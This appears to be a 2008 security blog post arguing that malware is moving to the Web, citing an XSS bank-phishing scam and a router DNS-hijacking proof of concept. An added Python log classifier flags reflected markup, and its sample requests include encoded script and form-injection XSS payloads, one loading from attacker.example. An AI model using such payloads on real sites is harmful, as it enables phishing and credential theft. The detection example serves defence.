Archive for January 12th, 2008

The future of malware doesn't belong to our hard disks.
While we're still trying to harden our PCs against malicious executables by using unprivileged accounts, wrapping our browsers inside sandboxes and trusting antivirus programs, our digital assets are quickly moving to another place: how much of our identity and money is already on the Web? Even better, how much of our identity and money is not available somewhere on the Web yet?

Since most malware is after our identity, our money or both, why shouldn't it follow the same path?
And if today's malware mostly runs on Windows because it's the commonest executable platform, tomorrow's will likely run on the Web, for the very same reason. Because, like it or not, the Web is already a huge executable platform, and we should start thinking of it this way, from a security perspective.

I know my words may sound too speculative, even plain FUD, but real scams and very scary proofs of concept are already here, mocking the "old school" belief that only local execution and privilege escalation are severe threats:

  • Real scam -- The ultimate bank phishing using XSS.
    The credential harvesting form has been embedded inside the real bank page, served through a "secure" HTTPS connection with a valid SSL certificate, exploiting a reflected XSS vulnerability. Absolutely nothing new, and a relatively poorly performed trick too: the attackers could just as easily have chosen to host the whole payload inside their XSS vector itself, making their fraud even stealthier without the remote inclusion of an external resource from a different domain. But since they didn't, they surely judged their way good enough to work -- and it is, much more than any other phishing attempt you've seen so far, because this is the real bank site!!!
  • Scary Proof of Concept -- Malicious web page hijacking your router.
    You may think you've already heard this one: "Just change the default password, it's basic common sense" you say.
    But this time it's different: the GNUCITIZEN guys show us how to compromise your router's DNS settings from the web with no need to log in, by exploiting its "cool" UPnP features through XMLHttpRequest (if an XSS vulnerability is available, as happens in many devices) or Flash (if no XSS is found). And once an attacker owns your router's DNS, he controls all your LAN, not just your own traffic...
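
For defenders, the distinction drawn in the bank scam above (a reflected payload that pulls a resource from a different domain versus one carried entirely inside the vector) can be checked for in web server logs. The following is an added example, not part of the original post: the host `bank.example`, the sample request targets and the function name are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

SITE_HOST = "bank.example"  # assumption: the protected site's own host

# HTML elements that have no business arriving inside a request parameter.
MARKUP = re.compile(r"<\s*(script|iframe|form|img|object|embed)\b", re.I)
# Attributes that load from, or submit to, an absolute URL; group 1 is the host.
REMOTE = re.compile(
    r"""\b(?:src|action|href|data)\s*=\s*["']?\s*(?:https?:)?//([^/"'\s>:]+)""",
    re.I,
)

def classify(request_target):
    """Return (verdict, detail) for one logged request target (path + query)."""
    query = urlsplit(request_target).query
    # parse_qsl percent-decodes each value once, as the server would.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not MARKUP.search(value):
            continue
        foreign = [h.lower() for h in REMOTE.findall(value)
                   if h.lower() != SITE_HOST]
        if foreign:
            # Reflected markup that reaches out to another domain.
            return ("markup+foreign-host", f"{name} -> {foreign[0]}")
        # Self-contained markup: stealthier, but still not a normal parameter.
        return ("markup-inline", name)
    return ("clean", "")

# Constructed request targets, in the form they appear in an access log.
SAMPLE_REQUESTS = [
    "/search?q=mortgage+rates",
    "/search?q=%3Cscript+src%3D%22https%3A%2F%2Fattacker.example%2Fx.js"
    "%22%3E%3C%2Fscript%3E",
    "/search?q=%3Cform+action%3D%22%2Flogin%22%3E%3Cinput+name%3Dpin%3E"
    "%3C%2Fform%3E",
    "/help?topic=cards&ref=https%3A%2F%2Fpartner.example%2F",
]

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        verdict, detail = classify(target)
        print(f"{verdict:20} {detail:28} {target[:40]}")
```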

Does anybody still believe browsing the Web with Flash and JavaScript promiscuously enabled and no XSS protection is a good idea?
